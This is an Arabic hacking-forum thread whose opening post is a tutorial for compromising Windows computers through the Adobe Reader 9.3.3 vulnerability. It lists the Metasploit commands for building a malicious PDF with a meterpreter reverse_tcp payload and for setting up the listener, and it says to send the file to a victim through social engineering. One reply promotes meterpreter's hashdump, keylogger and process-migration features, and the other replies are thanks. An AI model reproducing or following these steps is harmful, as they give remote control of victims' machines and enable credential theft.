1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : D3VIL H4CK3R | المشاهدات : 6,022 | الردود : 12
حالة الموضوع:
مغلق
  1. D3VIL H4CK3R Developer

    الأنتساب:
    ‏4 مايو 2012
    المشاركات:
    102
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    50
    نظام التشغيل:
    windows 8
    اللغة البرمجية:
    HTML
    السلام عليكم ورحمة الله وبركاته

    الموضوع واضح من عنوانه وهو
    كيفية استخداف ثغرة الادوبي ريدر الاصدار 9.3.3
    لاختراق الاجهزة بعد تكوين ملف PDF وارساله للضحية بطرق الهندسة الاجتماعية

    1- نفتح التريمنال ونطبق الاوامر التالية

    كود PHP:
    use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs

    set payload windows
    /meterpreter/reverse_tcp

    set lhost ip local host

    set filename story
    .pdf

    exploit
    في الامر الاول استخدمنا الثغرة
    وفي الامر الثاني اخترنا البايلود الافضل وهو ميتربريتر
    وفي الامر الثالث عينا اي بي اللوكال هوست
    وفي الامر الثالث اخترنا اسم ملف PDF المكون
    وفي الامر الثالث استغلال الثغرة

    الصورة توضح اعلاه :

    [​IMG]

    طبعا مثل ما واضح بالصورة تكون الملف علي المسار

    كود PHP:
    /root/.msf4/local/story.pdf
    صورة الملف المكون :

    [​IMG]

    الان لازم نجهز عملية التنصت للاتصال العكسي المرسل من الضحية

    كود PHP:
    use exploit/multi/handler

    set payload windows
    /meterpreter/reverse_tcp

    set lhost ip
    الصورة توضح اعلاه :

    [​IMG]

    الان ترسل الملف الى الضحية وبعد فتحه ستحصل على جلسة الميتربريتر
     
  2. Mr.alex Developer

    الأنتساب:
    ‏5 مايو 2012
    المشاركات:
    1
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    الإقامة:
    ؟؟؟؟
    رد: استخدام ثغرة Adobe Reader v9.3.3 في اختراق الاجهزة عن طريق ملف PDF


    • الله يسلم ايديك يا غالى
      [*]ويعطيك العافية اخوىi:q^:
     
  3. T.72 Developer

    الأنتساب:
    ‏16 يناير 2012
    المشاركات:
    26
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    الإقامة:
    Special Forces
    رد: استخدام ثغرة Adobe Reader v9.3.3 في اختراق الاجهزة عن طريق ملف PDF

    في البايلود 2 انواع reverse_tcp and bind_tcp

    reverse_tcp بمعني أن الثغرة تشتغل علي جهاز الضحية وجهاز الضحية بيتصل بجهاز المهاجم

    اما bind_tcp يعني أن جهاز المهاجم هو الي يريد الاتصال بجهاز الضحية وممكن القايرويل بيمنع الاتصال وبيفشل الاختراق

    لو متذكر ايام زمان sub7 وأصحابه كانوااا بيستخدموااا في السيرفورات BIND_TCP واصحاب الحمايات وضعوااا فكرة PARFEAU

    واصحاب الاختراق وضعوااا فكرة REVERSE_TCP لو لا الهاكر ماكان موجود parfeau

    وبايلود meterpreter reverse_tcp قوي جدااا لأنه بيحتوي علي اوامر جميلة hashdump run vnc keylogger خاصية الحقن migrate الخ,,,

    بيستاهل نختاره :D
     
  4. jago-dz Developer

    الأنتساب:
    ‏6 مايو 2012
    المشاركات:
    3
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    الإقامة:
    bba
    رد: استخدام ثغرة Adobe Reader v9.3.3 في اختراق الاجهزة عن طريق ملف PDF

    السلام عليكم ورحمة الله وبركاته .. [​IMG]

    • كالعادة مبدع &:"

    • .. تحياتي لسموك يا كبير ولا تحرمنا من جديدك ..
     
  5. Exploit Developer

    الأنتساب:
    ‏6 مايو 2012
    المشاركات:
    21
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    الإقامة:
    ExploitSpot
    رد: استخدام ثغرة Adobe Reader v9.3.3 في اختراق الاجهزة عن طريق ملف PDF

    جمييييل يا غالي

    الله يبارك في اناملك

    ننتضر جديدك i:q^:
     
  6. i-Hmx Developer

    الأنتساب:
    ‏20 ابريل 2012
    المشاركات:
    56
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    30
    الإقامة:
    hacker
    رد: استخدام ثغرة Adobe Reader v9.3.3 في اختراق الاجهزة عن طريق ملف PDF

    يسلممو ياعسسل !

    i:q^:
     
  7. AhmeD DiaB Developer

    الأنتساب:
    ‏7 ابريل 2012
    المشاركات:
    20
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    الإقامة:
    مصر ام الدنيا
    رد: استخدام ثغرة Adobe Reader v9.3.3 في اختراق الاجهزة عن طريق ملف PDF

    يسلمو يا الغالي / تحياتي
     
  8. تــــركــــي DeveloPer Plus

    الأنتساب:
    ‏25 ابريل 2012
    المشاركات:
    180
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    40
    رد: استخدام ثغرة Adobe Reader v9.3.3 في اختراق الاجهزة عن طريق ملف PDF

    بارك الله فيك
    شكرا لك
    )5:"
     
  9. Hacker-DZ Developer

    الأنتساب:
    ‏2 مايو 2012
    المشاركات:
    36
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    نظام التشغيل:
    Linux
    اللغة البرمجية:
    Python
    رد: استخدام ثغرة Adobe Reader v9.3.3 في اختراق الاجهزة عن طريق ملف PDF

    وعليكم السلآم ورحمة الله وبركآتة
    يعطيك الف عافية يا بطل على الشرٍِح الرآئع
     
  10. n0.H4ck DeveloPer Plus

    الأنتساب:
    ‏7 مايو 2012
    المشاركات:
    122
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:
    50
    نظام التشغيل:
    Linux
    رد: استخدام ثغرة Adobe Reader v9.3.3 في اختراق الاجهزة عن طريق ملف PDF

    مشكووووووووووور اخووي على الموضوع .. &:":
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة